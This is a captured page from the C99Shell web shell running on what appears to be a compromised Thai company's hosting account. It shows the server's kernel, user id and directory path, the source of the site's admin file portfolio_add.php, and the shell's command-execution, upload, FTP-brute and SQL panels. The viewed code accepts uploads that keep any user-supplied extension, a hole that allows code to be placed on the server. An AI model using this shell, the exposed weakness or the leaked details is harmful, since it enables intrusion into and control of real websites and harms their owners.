!C99Shell v. 2.0 [PHP 7 Update] [25.02.2019]!

Software: Apache. PHP/5.6.40 

uname -a: Linux cpanel06wh.bkk1.cloud.z.com 2.6.32-954.3.5.lve1.4.80.el6.x86_64 #1 SMP Thu Sep 24
01:42:00 EDT 2020 x86_64
 

uid=851(cp949260) gid=853(cp949260) groups=853(cp949260) 

Safe-mode: OFF (not secure)

/home/cp949260/public_html/krupimhomecenter.com/office/   drwxr-xr-x
Free 237.96 GB of 981.82 GB (24.24%)
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Feedback    Self remove    Logout    


Viewing file:     portfolio_add.php (7.33 KB)      -rwxr-xr-x
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
<? 
include 'index_IncludeAdmin.php'
$_SESSION['page'] = 'portfolio.php';

if (
$_POST['portfolio_Add']) {
    
$Jpg strrchr($_FILES["portfolio_photo"]["name"],".");
    
$portfolio_photo rand().rand().$Jpg;
    if(
move_uploaded_file($_FILES["portfolio_photo"]["tmp_name"],"../Files/portfolio_photo/".$portfolio_photo)){

        
$salesteam_id htmlspecialchars($_POST['salesteam_id'], ENT_QUOTES );
        
$portfolio_name htmlspecialchars($_POST['portfolio_name'], ENT_QUOTES );
        
$portfolio_detail htmlspecialchars($_POST['portfolio_detail'], ENT_QUOTES );
        
$portfolio_review function_review($_POST['portfolio_review']);
        
$portfolio_page function_page(random_string().$portfolio_name);
        
        
$portfolio_Add "INSERT INTO `portfolio` (`salesteam_id`,`portfolio_page`,`portfolio_name`, `portfolio_detail`, `portfolio_photo`,`portfolio_review`,`portfolio_datetime`,`portfolio_date`,`portfolio_time`)
        VALUES('
$salesteam_id','$portfolio_page','$portfolio_name','$portfolio_detail','$portfolio_photo','$portfolio_review',now(),now(),now())";
        
$portfolio_Reult mysqli_query($con,$portfolio_Add);
        
$_SESSION[portfolio_id] = mysqli_insert_id($con);
        if (!
$portfolio_Reult) {
            echo
"<script>alert('เกิดข้อผิดพลาด หรือ ลิ้งเพจซ้ำ'); window.history.back(); </script>";
        }
        if (
$portfolio_Reult) {
            if(isset(
$_FILES['portfolio_picture_photo']['name'])&&$_FILES['portfolio_picture_photo']['name']!=''){
                
$Count count($_FILES['portfolio_picture_photo']['name']);
                for (
$i=0$i $Count$i++) { 
                    
$Jpg strrchr($_FILES["portfolio_picture_photo"]["name"][$i],".");
                    
$portfolio_picture_photo rand().rand().$Jpg;
                    if(
move_uploaded_file($_FILES["portfolio_picture_photo"]["tmp_name"][$i],"../Files/portfolio_picture_photo/".$portfolio_picture_photo)){
                        
$portfolio_picture_Add "INSERT INTO `portfolio_picture` (`portfolio_id`,`portfolio_picture_photo`) VALUES ('$_SESSION[portfolio_id]','$portfolio_picture_photo')";
                        
$portfolio_picture_Reult mysqli_query($con,$portfolio_picture_Add);
                        if (!
$portfolio_picture_Reult) {
                            echo
"<script>alert('Error portfolio_picture'); window.history.back(); </script>";
                        }
                    }
                }
            }

            echo
"<script>  window.location='portfolio_one.php?INSERT'; </script>";
        }    
    }    
}

?>

<!DOCTYPE html>
<html>
<head>
    <? include 'index_Head.php'?>
</head>
<body>
    <? include 'index_Navbar.php'?>    
    <div class="container-fluid">
        <div class="row">
            <div class="col-md-2" id="main-left">
                <div class="row">
                    <div class="col-md-12">
                        <? include 'index_AdminMenu.php'?>
                    </div>
                </div>
            </div>
            <div class="col-md-10">
                <div class="row">
                    <div class="col-md-12">
                        <h3>  เพิ่ม ผลงาน   </h3>
                        <hr>
                    </div>
                </div>
                <div class="row">
                    <div class="col-md-12 br-margin2">
                        <a href="portfolio.php" class="btn btn-primary"><span class="glyphicon glyphicon-step-backward"></span> กลับ </a>
                    </div>
                    <div class="col-md-12">
                        <form class="form-horizontal" method="post" encType="multipart/form-data">
                            <div class="panel panel-default">
                                <div class="panel-heading">
                                    กรอกรายละเอียด "ผลงาน" ที่ต้องการเพิ่ม
                                </div>
                                <div class="panel-body">
                                    <div class="form-group">
                                        <label class="control-label col-md-3" > ชื่อผลงาน  <span class="text-red"> * </span> </label>
                                        <div class="col-md-6">
                                            <input id="portfolio_name" type="text" class="form-control"  name="portfolio_name"  required  maxlength="80" placeholder="ความยาวไม่เกิน 80  ตัวอักษร" >
                                        </div>
                                        <label class="control-label col-md-3 text-left" > <span id="portfolio_name_chars" class="text-muted">  </span>  </label>
                                        <script type="text/javascript">
                                            var portfolio_name = 80;
                                            $('#portfolio_name').keyup(function() {
                                                var length = $(this).val().length;
                                                var length = portfolio_name-length;
                                                $('#portfolio_name_chars').text(length);
                                            });
                                        </script>
                                    </div>
                                    <div class="form-group">
                                        <label class="control-label col-md-3" > รายละเอียดเบื้องต้น </label>
                                        <div class="col-md-6">
                                            <textarea id="portfolio_detail" class="form-control" rows="4" name="portfolio_detail"  maxlength="250" placeholder="รายละเอียดแนะนำ สั้นๆ ความยาวไม่เกิน 250  ตัวอักษร"></textarea>
                                        </div>
                                        <label class="control-label col-md-2 text-left" > <span id="portfolio_detail_chars"  class="text-muted">  </span>  </label>
                                        <script type="text/javascript">
                                            var portfolio_detail = 250;
                                            $('#portfolio_detail').keyup(function() {
                                                var length = $(this).val().length;
                                                var length = portfolio_detail-length;
                                                $('#portfolio_detail_chars').text(length);
                                            });
                                        </script>
                                    </div>
                                    <div class="form-group">
                                        <label class="control-label col-md-3" > รูป ผลงาน <span class="text-red"> * </span> </label>
                                        <div class="col-md-6">
                                            <input Type="file" class="form-control"  name="portfolio_photo"  required>
                                        </div>
                                    </div>
                                    <div class="form-group">
                                        <label class="control-label col-md-3" > รูปภาพเพิ่มเติม  </label>
                                        <div class="col-md-6">
                                            <input type="file"  class="form-control" multiple="multiple" name="portfolio_picture_photo[]">
                                        </div>
                                        <label class="control-label col-md-3 text-left" >
                                            สามารถเพิ่มได้ภายหลัง
                                        </label>
                                    </div>
                                    <div class="form-group">
                                        <label class="control-label col-md-3" > ผลงานของ </label>
                                        <div class="col-md-6">
                                            <select class="form-control"  name="salesteam_id" >
                                                <option value="">--</option>
                                                <?
                                                $salesteam_SL 
" SELECT * FROM salesteam  ORDER BY salesteam_id ASC";
                                                
$salesteam_QR     mysqli_query($con,$salesteam_SL);
                                                while (
$salesteam     mysqli_fetch_array($salesteam_QR)) {
                                                    
?>
                                                    <option value="<?php echo $salesteam[salesteam_id]; ?>"><?php echo $salesteam[salesteam_name]; ?>  </option>
                                                    <?
                                                
}
                                                
?>
                                            </select>
                                        </div>
                                    </div>
                                    <div class="form-group"> 
                                        <div class="col-md-offset-3 col-md-6">
                                            <button Type="submit"  class="btn btn-success">
                                                <span class="glyphicon glyphicon-plus-sign"></span> ยืนยันการเพิ่ม
                                            </button>
                                            <input Type="hidden" name="portfolio_Add" value="x">
                                        </div>
                                    </div>
                                </div>
                            </div>
                            <div class="panel panel-default">
                                <div class="panel-heading">
                                    เนื้อหา
                                </div>
                                <div class="panel-body">
                                    <textarea class="ckeditor" name="portfolio_review">

                                    </textarea>
                                </div>
                            </div>
                        </form>
                    </div>
                    <!-- 12 -->
                </div>
                <!-- row -->
            </div>
            <!-- 10 -->
        </div>
        <!-- row -->
    </div>
    <!-- container -->
</body>
</html>



:: Command execute ::

Enter:
 
Select:
 

:: Search ::
  - regexp 

:: Upload ::
 
[ ok ]

:: Make Dir ::
 
[ ok ]
:: Make File ::
 
[ ok ]

:: Go Dir ::
 
:: Go File ::
 

--[ c99shell v. 2.0 [PHP 7 Update] [25.02.2019] maintained by KaizenLouie | C99Shell Github | Generation time: 0.0158 ]--